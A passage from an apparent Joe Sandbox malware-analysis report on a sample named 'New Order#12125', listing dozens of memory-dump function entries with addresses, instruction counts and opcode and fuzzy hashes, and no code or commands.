                                                                        Function 015980A8 Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                        • Instruction ID: 7ae48c8367105c83ced38d090973e188c04ddaffc8bc7f92ac0de62c23df97c0
                                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                        • Instruction Fuzzy Hash: 692181B290020AEFDF129F58CC40B9EBBB9FF89350F204455F900AB251D734D9509B50
                                                                        Function 015CEE26 Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e15cc66c493ec87e1f16fcafaae683231044017e0eff3148481e84279e4a8e58
                                                                        • Instruction ID: 01d93adab2c06223d5805eeddd4b882b4782e520f90020da7ab498899c2c992b
                                                                        • Opcode Fuzzy Hash: e15cc66c493ec87e1f16fcafaae683231044017e0eff3148481e84279e4a8e58
                                                                        • Instruction Fuzzy Hash: 2821AF33A108119F9B18CF7CC80546AF7E6FFCD35436A427ED912DB2A4D670BA158A84
                                                                        Function 01530124 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                        • Instruction ID: d37047259dad0c441b5a36fd9975d18007a774803fde577482529811605d3871
                                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                        • Instruction Fuzzy Hash: 9F11DD72600706AFE722DA58CC81F9ABBB8FBD0764F100429F6058F190E671ED44DB60
                                                                        Function 01508770 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5181d11936f6d4c1da24dcebee36d1e4d69a40bde6f59957180cf1a9d9fd1f95
                                                                        • Instruction ID: f0eeeea8da5cfd53f900aa7ab01ca0677c0ca59c476c9155ccd68274bd13a4fd
                                                                        • Opcode Fuzzy Hash: 5181d11936f6d4c1da24dcebee36d1e4d69a40bde6f59957180cf1a9d9fd1f95
                                                                        • Instruction Fuzzy Hash: 5711B231B006119BDB16CF8DC480E5ABBE9BF9A710B18407DEE089F249D6B2D9018B90
                                                                        Function 0153AAEE Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                        • Instruction ID: e5c2d663b6fa3ff9967a9fcf501e4e2243fc17ded3f51f2a1b33c3b0a02291e0
                                                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                        • Instruction Fuzzy Hash: C3217972600A41DFD72A9F49C560A6ABBE6FBD5B10F14887DE58ACB610C731EC01CB80
                                                                        Function 015080E9 Relevance: .1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 109b282de417689e56769a3ef798365f0e1a8e3e609426937603ff6b248b5e7b
                                                                        • Instruction ID: b0b0317616a573e3dc99673da31d5b33654b0815459a4f7b6f2b493170fff896
                                                                        • Opcode Fuzzy Hash: 109b282de417689e56769a3ef798365f0e1a8e3e609426937603ff6b248b5e7b
                                                                        • Instruction Fuzzy Hash: 0D216835A00206DFCB15CF98C580AAEBBB5FF88318F20416DD105AB350CB71AD06CB90
                                                                        Function 0153674D Relevance: .1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 166e74b8905a6ed9c5ac579072f3773007384dfbe5622f68b298745ad89fcc40
                                                                        • Instruction ID: e23ab528374f2d4ca6be32bcef41287752c8bd4ac7e9432060939736950cd065
                                                                        • Opcode Fuzzy Hash: 166e74b8905a6ed9c5ac579072f3773007384dfbe5622f68b298745ad89fcc40
                                                                        • Instruction Fuzzy Hash: 7E216075510A01EFD7219F69C841F66B7F8FF84250F44882DE59ACB250EB70B950CB60
                                                                        Function 01596870 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8c94f536ce5d01c217e555b6962ffc68940dc11ef6262aee2e562d482f61f566
                                                                        • Instruction ID: f5787c4e668c1dae488f2417b860cc6fb9db6d7fc5f4ab57ed066be603625df0
                                                                        • Opcode Fuzzy Hash: 8c94f536ce5d01c217e555b6962ffc68940dc11ef6262aee2e562d482f61f566
                                                                        • Instruction Fuzzy Hash: 04118F32240515AFDB22DBADC940F9A7BE8BB95660F114025F205DF261EB70E90987A1
                                                                        Function 0152E8C0 Relevance: .1, Instructions: 63COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 28866ccf81923f21a086739d45ab6d1015b0de37bf9f505722584b94cb73d46c
                                                                        • Instruction ID: 913dda248958b4eddc2177e73dced244e9f380ffda58a0c3ad0630c02be6c6bb
                                                                        • Opcode Fuzzy Hash: 28866ccf81923f21a086739d45ab6d1015b0de37bf9f505722584b94cb73d46c
                                                                        • Instruction Fuzzy Hash: 63110C337051155FDB1ADB29DC51A6F729AFFD6374B25492AE5228F294EA309801C390
                                                                        Function 015366B0 Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5371e0dd6dd5da1db978db9b1235f4aa613dee0e4deb458df56e0863c1d92222
                                                                        • Instruction ID: 9cb778aaece8f8a565722dc1c2865c25b13f38893ac526ecc268e916e4fc53b1
                                                                        • Opcode Fuzzy Hash: 5371e0dd6dd5da1db978db9b1235f4aa613dee0e4deb458df56e0863c1d92222
                                                                        • Instruction Fuzzy Hash: 90118C76A01206ABCB26CF99C580A5ABBE9BFD4650B56407DD905DF315E634EE00CBA0
                                                                        Function 015CA8E4 Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                        • Instruction ID: 5b9da76b9040c919ca3f8b69b84ee6e3c3ae63cc54ff3eb9dcb49eff6268ea6d
                                                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                        • Instruction Fuzzy Hash: 6E11E236A0090AAFDB19CF98C841A9DBBB5FFC4610F058269E8459B340E671AD01CB80
                                                                        Function 01500AD0 Relevance: .1, Instructions: 61COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                        • Instruction ID: 29a5cbbc92a9aeeb74f62d438cd7dcfc8ff755eafab0943f0337f3a88e879d2a
                                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                        • Instruction Fuzzy Hash: A22106B5A00B059FD3A0CF29D441B56BBF4FB48B10F10492EE98ACBB40E371E814CB90
                                                                        Function 0158E7E1 Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                        • Instruction ID: 8f11a2c146a9e967156171fc516f21f296ce218751283c1c24d5c46cb47bca18
                                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                        • Instruction Fuzzy Hash: 30119E32620601EFE721AF49C846B5EBBF5FB86754F058428EA09AF160DB71DC41DF90
                                                                        Function 015227ED Relevance: .1, Instructions: 58COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29537cfaded60625eed0e15910a684117b70edb9150b32661425863528e5c0a1
                                                                        • Instruction ID: 2a0c8e5c47052b0846b6d2d10117ec3203106095692a14c4398c6e8568a95e01
                                                                        • Opcode Fuzzy Hash: 29537cfaded60625eed0e15910a684117b70edb9150b32661425863528e5c0a1
                                                                        • Instruction Fuzzy Hash: A4012636305686ABF326A66EDC44F2B7BDCFF91390F050465F9009F291D954DC00C2B1
                                                                        Function 01504690 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6892bab2cd37c44aa5a7efad6d20a12168e3809f7199808479846e57e31d200d
                                                                        • Instruction ID: 05c73d30e4e2b53c09ee410bc95c3acf26cc82cbac66b3ea5335e63cfb5170be
                                                                        • Opcode Fuzzy Hash: 6892bab2cd37c44aa5a7efad6d20a12168e3809f7199808479846e57e31d200d
                                                                        • Instruction Fuzzy Hash: 9711A076200645AFDB27DF9DD940B5A7BA4FB86B64F14461AFA058F6A0C370E801CF60
                                                                        Function 015D4B00 Relevance: .1, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d3a22331c32baeed6efb0f537bd98f781586d6eb05b0dd4f4a546f0ecdc4afdb
                                                                        • Instruction ID: 86e25276549b4aec253140d1aa8df10a538b68858a2585c0ffd2eea6835856da
                                                                        • Opcode Fuzzy Hash: d3a22331c32baeed6efb0f537bd98f781586d6eb05b0dd4f4a546f0ecdc4afdb
                                                                        • Instruction Fuzzy Hash: D011C6362006119FEB329B6DD844F6BB7A6FFD5710F154429E696CFA94DA30A802CB90
                                                                        Function 01536620 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b745961e387ff0212b474a0894f6955d4f70c520f1ab427e11c8f41e0c879f42
                                                                        • Instruction ID: 2b503c5e0bf002e24afa9823a003c4ed08a73314c392b5393a347400f8db86c8
                                                                        • Opcode Fuzzy Hash: b745961e387ff0212b474a0894f6955d4f70c520f1ab427e11c8f41e0c879f42
                                                                        • Instruction Fuzzy Hash: AB118276A00616BBDB22DF59C980B5EFBB8FFC4790F51045DDA01AF240D730AE059B60
                                                                        Function 0152EA2E Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8012fb2312679b1a33b281b368a2a3e4d3a3358930a82398760933a85a097832
                                                                        • Instruction ID: 942a7d0d990e0539fce4b1c173fe4b8c801e3ae03f22fb9ff10267bb25cc0b1a
                                                                        • Opcode Fuzzy Hash: 8012fb2312679b1a33b281b368a2a3e4d3a3358930a82398760933a85a097832
                                                                        • Instruction Fuzzy Hash: 2F01D2725111069FC325DB19D449F16BBF9FBC2314F21816EE105CF2A4D7B09D46CB90
                                                                        Function 0152E53E Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                        • Instruction ID: 58113bb5056f1347dfdf6ff414e5c3facdedbd3234915224178a75d77760e003
                                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                        • Instruction Fuzzy Hash: C511CC727116D29BE723971CD565B2D77D8FF41798F1904A1DD418F792F728C842C290
                                                                        Function 0158E75D Relevance: .1, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                        • Instruction ID: 6e1eb19433699b8a3418bdc28b2429b9c4318e8993f9d4e03ecb527395d9611d
                                                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                        • Instruction Fuzzy Hash: 2C019236600146AFE722BF58CC02F6A7AB9FB95750F058424EA05FF264E771DD40C790
                                                                        Function 014FA250 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                        • Instruction ID: d414ccfdd12e44807e9ad850c15d028fa7da8e01779e3c3fbebc2cda3111d5aa
                                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                        • Instruction Fuzzy Hash: 03012639614B229BCB318F19E840A337BA4FF95770711862EFE998B3A1D731D401CBA0
                                                                        Function 015D4940 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 983798c0de0a315725ff20d93cba6c68efd4320a077fb53af4d19788198f53c8
                                                                        • Instruction ID: d957c66eb39fce6102cc0a926bc9649325c30b991d858f71b1cdfba558329405
                                                                        • Opcode Fuzzy Hash: 983798c0de0a315725ff20d93cba6c68efd4320a077fb53af4d19788198f53c8
                                                                        • Instruction Fuzzy Hash: A701F5725416029FC332DF1ED840E16B7A8FB91770B254265E9A99F5AAE730EC01CBD0
                                                                        Function 0157E1D0 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a54a57b723d06be81235c074cb0e94c65a86c96975749c451a8bc6a0c7273b4a
                                                                        • Instruction ID: e8aa2b2f19688f0fdf155c5d77c2b98858a9b30f9e850f9a67505d3ada3ae85f
                                                                        • Opcode Fuzzy Hash: a54a57b723d06be81235c074cb0e94c65a86c96975749c451a8bc6a0c7273b4a
                                                                        • Instruction Fuzzy Hash: 1411CE32241302EFDB16AF09D882F06BBB8FF94B44F2000A9E9058F691C231ED00CA90
                                                                        Function 01506259 Relevance: .1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a271c4f92575d0fc2c29f3ab38c1b984c18751ded9627cc5ba3e951456482d0a
                                                                        • Instruction ID: c246a74312d70e888b68cbc9555f202e9b3d7e843068d2ffac39b29489be2c35
                                                                        • Opcode Fuzzy Hash: a271c4f92575d0fc2c29f3ab38c1b984c18751ded9627cc5ba3e951456482d0a
                                                                        • Instruction Fuzzy Hash: 1C115E7054122AABDB66EB64CC41FE97374BF44714F504194B318AA0E1D6709E91DF84
                                                                        Function 01586050 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f02488665c96ea2668e018b829ec701f39f9f77c2e4cadbf103b17b975ceed30
                                                                        • Instruction ID: 4398f694ecb6865aef0f78a6cf7c0a50bfbfd4d50fda22e9df9705349e2f3274
                                                                        • Opcode Fuzzy Hash: f02488665c96ea2668e018b829ec701f39f9f77c2e4cadbf103b17b975ceed30
                                                                        • Instruction Fuzzy Hash: 1C111B76900019EBCB12EB94CC80DDF7BBCFF48254F054166A506EB211EA34AA15CBE0
                                                                        Function 0150208A Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                        • Instruction ID: 531518215f4d8cc25383dfe75f22156680fbdfb9fb0995652ab0ad1f3da763a6
                                                                        • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                        • Instruction Fuzzy Hash: E10128322012118BEF12CA9DD894B5A77ABBFC4710F5544A6ED058F286DA71CC81C390
                                                                        Function 01596500 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 554273877128b994a3be447f852dd7691fe8672355be180a3b872a91ba0d1235
                                                                        • Instruction ID: b37d8d4a1dfd83749a6c4d294c64dc45f48e349a2bdd855ca748ea3f326d1ca8
                                                                        • Opcode Fuzzy Hash: 554273877128b994a3be447f852dd7691fe8672355be180a3b872a91ba0d1235
                                                                        • Instruction Fuzzy Hash: 481108326001469FD701CF28D440BA5BBF5FB96304F498159E844CF315D731EC44CBA1
                                                                        Function 0158C810 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2815d89051aaccd6948504ba1440be2f0650134c7214aa5e1b4796bafb4a5bda
                                                                        • Instruction ID: 16c70abaa4e7c803c4a74bd3bd7af9e98645abb00841156cc0a0eeec254ec29e
                                                                        • Opcode Fuzzy Hash: 2815d89051aaccd6948504ba1440be2f0650134c7214aa5e1b4796bafb4a5bda
                                                                        • Instruction Fuzzy Hash: 361118B1A0020A9FCB00DFA9D541AAEBBF8FF58250F10406AA905EB351D674EA018BA4
                                                                        Function 015AEA60 Relevance: .0, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9997db2cc11e35c6db11311bbd45cd59029f30c0f1c97c542f689a0eb6be7243
                                                                        • Instruction ID: e8fc2069955b525fd1d184113e794cb83d5a6fde66db4a948aebb68114987f2f
                                                                        • Opcode Fuzzy Hash: 9997db2cc11e35c6db11311bbd45cd59029f30c0f1c97c542f689a0eb6be7243
                                                                        • Instruction Fuzzy Hash: 1001D8311811129BDB33AB15C495D3EBBFAFF92650F95482EE2455F211C770EC41CB91
                                                                        Function 014FC020 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                        • Instruction ID: f1637cbd384631f4575ff8099b55993e8eada5c426a9b1a1f675889785142be4
                                                                        • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                        • Instruction Fuzzy Hash: 6D01B57210070A9FEB6296A9C850EA777F9FFC6254F04481EAA568F650DA70E502C750
                                                                        Function 015420F0 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7f8cfa088750c6c78b56d30d2a3b6fec670701b6b2dd846b8fbe6b09285a1e52
                                                                        • Instruction ID: f97c12ecc3b72bdfa5012286a9ed5204a64946c821b70950e724fd982edae7c2
                                                                        • Opcode Fuzzy Hash: 7f8cfa088750c6c78b56d30d2a3b6fec670701b6b2dd846b8fbe6b09285a1e52
                                                                        • Instruction Fuzzy Hash: E9116935A0120EAFDB05EFA4D851BAE7BB5FB84284F004099F9019B290EB35AE11CB90
                                                                        Function 0153E5CF Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
